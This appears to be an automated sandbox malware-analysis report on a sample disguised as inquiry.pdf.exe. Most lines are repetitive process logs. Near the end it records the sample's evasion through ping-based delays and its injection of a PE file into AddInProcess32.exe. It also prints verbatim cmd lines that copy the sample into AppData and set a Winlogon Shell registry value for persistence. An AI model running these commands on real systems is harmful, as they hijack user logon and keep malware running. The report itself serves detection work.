            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Uses ping.exe to sleep
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 4132Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 3520Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exe TID: 3624Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exe TID: 4420Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1920Thread sleep count: 60 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe TID: 2768Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe TID: 1668Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeWindow / User API: threadDelayed 3504Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485643024.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\inquiry.pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 900000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 901000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 919000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 91E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A54000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A57000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A59000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6AB008Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 419000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 554000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 557000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 559000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AF6008Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 900000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,Jump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" Jump to behavior
